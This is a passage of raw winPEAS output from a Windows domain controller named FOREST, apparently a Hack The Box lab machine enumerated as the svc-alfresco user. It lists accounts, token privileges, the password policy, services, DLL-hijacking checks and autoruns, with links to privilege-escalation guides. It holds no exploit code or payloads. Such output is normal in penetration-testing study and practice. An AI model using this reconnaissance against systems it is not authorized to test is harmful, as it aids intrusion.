  RpcProxy\49676                                                                                       Everyone [WriteData/CreateFiles]                                       O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)

  RpcProxy\593                                                                                         Everyone [WriteData/CreateFiles]                                       O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)

  vgauth-service                                                                                       Everyone [WriteData/CreateFiles]                                       O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)


ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating AMSI registered providers
    Provider:       {2781761E-28E0-4109-99FE-B9D127C57AFE}
    Path:           C:\Program Files\Windows Defender\MpOav.dll

   =================================================================================================                                                                              


ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon configuration
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon process creation logs (1)
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Installed .NET versions
                                                                                         


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Interesting Events information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                        

ÉÍÍÍÍÍÍÍÍÍ͹ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials                                                        
                                                                                         
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Printing Account Logon Events (4624) for the last 10 days.
                                                                                         
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Process creation events - searching logs (EID 4688) for sensitive data.
                                                                                         
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell events - script block logs (EID 4104) - searching for sensitive data.                                                                                     
                                                                                         
  [X] Exception: Attempted to perform an unauthorized operation.

ÉÍÍÍÍÍÍÍÍÍ͹ Displaying Power off/on events for last 5 days
                                                                                         
System.UnauthorizedAccessException: Attempted to perform an unauthorized operation.
   at System.Diagnostics.Eventing.Reader.EventLogException.Throw(Int32 errorCode)
   at System.Diagnostics.Eventing.Reader.NativeWrapper.EvtQuery(EventLogHandle session, String path, String query, Int32 flags)
   at System.Diagnostics.Eventing.Reader.EventLogReader..ctor(EventLogQuery eventQuery, EventBookmark bookmark)
   at winPEAS.Helpers.MyUtils.GetEventLogReader(String path, String query, String computerName)
   at winPEAS.Info.EventsInfo.Power.Power.<GetPowerEventInfos>d__0.MoveNext()
   at winPEAS.Checks.EventsInfo.PowerOnEvents()


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Users Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                                     

ÉÍÍÍÍÍÍÍÍÍ͹ Users
È Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups                            
  [X] Exception: Object reference not set to an instance of an object.
  Current user: svc-alfresco
  Current groups: Domain Users, Everyone, Users, Builtin\Pre-Windows 2000 Compatible Access, Builtin\Remote Management Users, Account Operators, Network, Authenticated Users, This Organization, Privileged IT Accounts, Service Accounts, NTLM Authentication
   =================================================================================================                                                                              

    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Current User Idle Time
   Current User   :     HTB\svc-alfresco
   Idle Time      :     00h:55m:35s:812ms

ÉÍÍÍÍÍÍÍÍÍ͹ Display Tenant information (DsRegCmd.exe /status)

ÉÍÍÍÍÍÍÍÍÍ͹ Current Token privileges
È Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#token-manipulation                
    SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

ÉÍÍÍÍÍÍÍÍÍ͹ Clipboard text

ÉÍÍÍÍÍÍÍÍÍ͹ Logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Display information about local users
   Computer Name           :   FOREST
   User Name               :   Administrator
   User Id                 :   500
   Is Enabled              :   True
   User Type               :   Administrator
   Comment                 :   Built-in account for administering the computer/domain
   Last Logon              :   12/19/2023 5:37:37 AM
   Logons Count            :   97
   Password Last Set       :   8/30/2021 4:51:58 PM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   Guest
   User Id                 :   501
   Is Enabled              :   False
   User Type               :   Guest
   Comment                 :   Built-in account for guest access to the computer/domain
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   krbtgt
   User Id                 :   502
   Is Enabled              :   False
   User Type               :   User
   Comment                 :   Key Distribution Center Service Account
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/18/2019 2:53:23 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   DefaultAccount
   User Id                 :   503
   Is Enabled              :   False
   User Type               :   User
   Comment                 :   A user account managed by the system.
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   $331000-VK4ADACQNUCA
   User Id                 :   1123
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_2c8eef0a09b545acb
   User Id                 :   1124
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_ca8c2ed5bdab4dc9b
   User Id                 :   1125
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_75a538d3025e4db9a
   User Id                 :   1126
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_681f53d4942840e18
   User Id                 :   1127
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_1b41c9286325456bb
   User Id                 :   1128
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_9b69f1b9d2cc45549
   User Id                 :   1129
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_7c96b981967141ebb
   User Id                 :   1130
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_c75ee099d0a64c91b
   User Id                 :   1131
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   SM_1ffab36a2f5f479cb
   User Id                 :   1132
   Is Enabled              :   False
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailboxc3d7722
   User Id                 :   1134
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   9/23/2019 3:57:12 PM
   Logons Count            :   1470
   Password Last Set       :   9/23/2019 2:51:31 PM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailboxfc9daad
   User Id                 :   1135
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   9/23/2019 3:52:05 PM
   Logons Count            :   59
   Password Last Set       :   9/23/2019 2:51:35 PM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailboxc0a90c9
   User Id                 :   1136
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:56:35 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailbox670628e
   User Id                 :   1137
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:56:45 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailbox968e74d
   User Id                 :   1138
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:56:56 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailbox6ded678
   User Id                 :   1139
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:57:06 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailbox83d6781
   User Id                 :   1140
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:57:17 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailboxfd87238
   User Id                 :   1141
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:57:27 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailboxb01ac64
   User Id                 :   1142
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:57:37 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailbox7108a4e
   User Id                 :   1143
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:57:48 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   HealthMailbox0659cc1
   User Id                 :   1144
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 3:57:58 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   sebastien
   User Id                 :   1145
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   9/22/2019 3:29:29 PM
   Logons Count            :   8
   Password Last Set       :   9/19/2019 4:29:59 PM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   lucinda
   User Id                 :   1146
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/19/2019 4:44:13 PM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   svc-alfresco
   User Id                 :   1147
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   12/19/2023 6:01:58 AM
   Logons Count            :   7
   Password Last Set       :   12/19/2023 6:30:50 AM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   andy
   User Id                 :   1150
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/22/2019 2:44:16 PM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   mark
   User Id                 :   1151
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/20/2019 2:57:30 PM

   =================================================================================================                                                                              

   Computer Name           :   FOREST
   User Name               :   santi
   User Id                 :   1152
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   9/20/2019 3:02:55 PM

   =================================================================================================                                                                              


ÉÍÍÍÍÍÍÍÍÍ͹ RDP Sessions
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Ever logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\Public
    C:\Users\sebastien
    C:\Users\svc-alfresco : svc-alfresco [AllAccess]

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  HTB

ÉÍÍÍÍÍÍÍÍÍ͹ Password Policies
È Check for a possible brute-force 
  [X] Exception: System.OverflowException: Negating the minimum value of a twos complement number is invalid.                                                                     
   at System.TimeSpan.op_UnaryNegation(TimeSpan t)                                       
   at winPEAS.Info.UserInfo.UserInfoHelper.GetPasswordPolicy()                           
    Domain: Builtin
    SID: S-1-5-32
    MaxPasswordAge: 42.22:47:31.7437440
    MinPasswordAge: 00:00:00
    MinPasswordLength: 0
    PasswordHistoryLength: 0
    PasswordProperties: 0
   =================================================================================================                                                                              


ÉÍÍÍÍÍÍÍÍÍ͹ Print Logon Sessions


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Processes Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                                 

ÉÍÍÍÍÍÍÍÍÍ͹ Interesting Processes -non Microsoft-
È Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes                                                                      
  [X] Exception: Access denied 

ÉÍÍÍÍÍÍÍÍÍ͹ Vulnerable Leaked Handlers
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation                                                                    
È Getting Leaked Handlers, it might take some time...
  [X] Exception: System.Runtime.InteropServices.COMException (0x80070006): The handle is invalid. (Exception from HRESULT: 0x80070006 (E_HANDLE))                                 
   at System.Runtime.InteropServices.Marshal.ThrowExceptionForHRInternal(Int32 errorCode, IntPtr errorInfo)                                                                       
   at System.Runtime.InteropServices.Marshal.FreeHGlobal(IntPtr hglobal)                 
   at winPEAS.Native.Classes.UNICODE_STRING.Dispose(Boolean disposing)                   


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Services Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                                  
  [X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.                                                              

ÉÍÍÍÍÍÍÍÍÍ͹ Interesting Services -non Microsoft-
È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services                                                                       
  [X] Exception: Access denied 
    @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\drivers\arcsas.sys] - Boot
   =================================================================================================                                                                              

    @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\drivers\bxvbda.sys] - Boot
   =================================================================================================                                                                              

    @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(QLogic Corporation - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\drivers\bxfcoe.sys] - Boot
   =================================================================================================                                                                              

    @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(QLogic Corporation - @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\drivers\bxois.sys] - Boot
   =================================================================================================                                                                              

    @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\Windows\System32\drivers\cht4vx64.sys] - System                                                                     
   =================================================================================================                                                                              

    @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\Windows\System32\drivers\e1i63x64.sys] - System                                                                             
   =================================================================================================                                                                              

    @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(QLogic Corporation - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\drivers\evbda.sys] - Boot                                                                       
   =================================================================================================                                                                              

    @iastorav.inf,%iaStorAV.DeviceDesc%;Intel(R) SATA RAID Controller Windows(Intel Corporation - @iastorav.inf,%iaStorAV.DeviceDesc%;Intel(R) SATA RAID Controller Windows)[System32\drivers\iaStorAV.sys] - Boot                                                         
   =================================================================================================                                                                              

    @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\drivers\iaStorV.sys] - Boot                                                                        
   =================================================================================================                                                                              

    @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\Windows\System32\drivers\ibbus.sys] - System                                                  
   =================================================================================================                                                                              

    @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\Windows\System32\drivers\mlx4_bus.sys] - System                                                               
   =================================================================================================                                                                              

    @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\Windows\System32\drivers\ndfltr.sys] - System
   =================================================================================================                                                                              

    @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[System32\drivers\ql2300i.sys] - Boot
   =================================================================================================                                                                              

    @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\drivers\ql40xx2i.sys] - Boot                                                              
   =================================================================================================                                                                              

    @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\drivers\qlfcoei.sys] - Boot
   =================================================================================================                                                                              

    @netgrea.inf,%Svc-Mp-Gre-DispName%;WAN Miniport (GRE)(@netgrea.inf,%Svc-Mp-Gre-DispName%;WAN Miniport (GRE))[C:\Windows\System32\drivers\rasgre.sys] - System
    @netgrea.inf,%Svc-Mp-Gre-DispName%;WAN Miniport (GRE)
   =================================================================================================                                                                              

    @usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\Windows\System32\drivers\USBSTOR.SYS] - System
   =================================================================================================                                                                              

    @usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\Windows\System32\drivers\USBXHCI.SYS] - System                                                               
   =================================================================================================                                                                              

    VMware Alias Manager and Ticket Service(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Autoload
    Alias Manager and Ticket Service
   =================================================================================================                                                                              

    @oem0.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(VMware, Inc. - @oem0.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\drivers\vmci.sys] - Boot
   =================================================================================================                                                                              

    Memory Control Driver(VMware, Inc. - Memory Control Driver)[C:\Windows\system32\DRIVERS\vmmemctl.sys] - Autoload                                                              
    Driver to provide enhanced memory management of this virtual machine.
   =================================================================================================                                                                              

    @oem5.inf,%VMMouse.SvcDesc%;VMware Pointing Device(VMware, Inc. - @oem5.inf,%VMMouse.SvcDesc%;VMware Pointing Device)[C:\Windows\System32\drivers\vmmouse.sys] - System
   =================================================================================================                                                                              

    VMware Tools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Autoload                                                                     
    Provides support for synchronizing objects between the host and guest operating systems.                                                                                      
   =================================================================================================                                                                              

    @oem4.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device(VMware, Inc. - @oem4.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device)[C:\Windows\System32\drivers\vmusbmouse.sys] - System
   =================================================================================================                                                                              

    VMware CAF AMQP Communication Service(VMware CAF AMQP Communication Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\CommAmqpListener.exe"] - System         
    VMware Common Agent AMQP Communication Service
   =================================================================================================                                                                              

    VMware CAF Management Agent Service(VMware CAF Management Agent Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ManagementAgentHost.exe"] - System          
    VMware Common Agent Management Agent Service
   =================================================================================================                                                                              

    vSockets Virtual Machine Communication Interface Sockets driver(VMware, Inc. - vSockets Virtual Machine Communication Interface Sockets driver)[system32\DRIVERS\vsock.sys] - Boot
    vSockets Driver
   =================================================================================================                                                                              

    @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\drivers\vstxraid.sys] - Boot
   =================================================================================================                                                                              

    @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\Windows\System32\drivers\winmad.sys] - System
   =================================================================================================                                                                              

    @winusb.inf,%WINUSB_SvcDesc%;WinUsb Driver(@winusb.inf,%WINUSB_SvcDesc%;WinUsb Driver)[C:\Windows\System32\drivers\WinUSB.SYS] - System
   =================================================================================================                                                                              

    @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\Windows\System32\drivers\winverbs.sys] - System
   =================================================================================================                                                                              


ÉÍÍÍÍÍÍÍÍÍ͹ Modifiable Services
È Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services                                                   
    You cannot modify any service

ÉÍÍÍÍÍÍÍÍÍ͹ Looking if you can modify any service registry
È Check if you can modify the registry of a service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions                
    [-] Looks like you cannot change the registry of any service...

ÉÍÍÍÍÍÍÍÍÍ͹ Checking write permissions in PATH folders (DLL Hijacking)
È Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking                                          
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Applications Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                              

ÉÍÍÍÍÍÍÍÍÍ͹ Current Active Window Application
  [X] Exception: Object reference not set to an instance of an object.

ÉÍÍÍÍÍÍÍÍÍ͹ Installed Applications --Via Program Files/Uninstall registry--
È Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software                                            
    C:\Program Files\Common Files
    C:\Program Files\desktop.ini
    C:\Program Files\internet explorer
    C:\Program Files\Uninstall Information
    C:\Program Files\VMware
    C:\Program Files\Windows Defender
    C:\Program Files\WindowsApps
    C:\Program Files\WindowsPowerShell


ÉÍÍÍÍÍÍÍÍÍ͹ Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries   
Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()                                           
   at System.Management.ManagementScope.Initialize()                                     
   at System.Management.ManagementObjectSearcher.Initialize()                            
   at System.Management.ManagementObjectSearcher.Get()                                   
   at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()                            

    RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    Key: VMware User Process
    Folder: C:\Program Files\VMware\VMware Tools
    File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected)                                                                                
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    Key: Common Startup
    Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)                                                                            
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
    Key: Common Startup
    Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)                                                                            
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    Key: Userinit
    Folder: C:\Windows\system32
    File: C:\Windows\system32\userinit.exe,
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    Key: Shell
    Folder: None (PATH Injection)
    File: explorer.exe
   =================================================================================================                                                                              


    RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
    Key: AlternateShell
    Folder: None (PATH Injection)
    File: cmd.exe
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers
    Key: Adobe Type Manager
    Folder: None (PATH Injection)
    File: atmfd.dll
   =================================================================================================                                                                              


    RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
    Key: Adobe Type Manager
    Folder: None (PATH Injection)
    File: atmfd.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: _Wow64
    Folder: None (PATH Injection)
    File: Wow64.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: _Wow64cpu
    Folder: None (PATH Injection)
    File: Wow64cpu.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: _Wow64win
    Folder: None (PATH Injection)
    File: Wow64win.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: advapi32
    Folder: None (PATH Injection)
    File: advapi32.dll
   =================================================================================================                                                                              


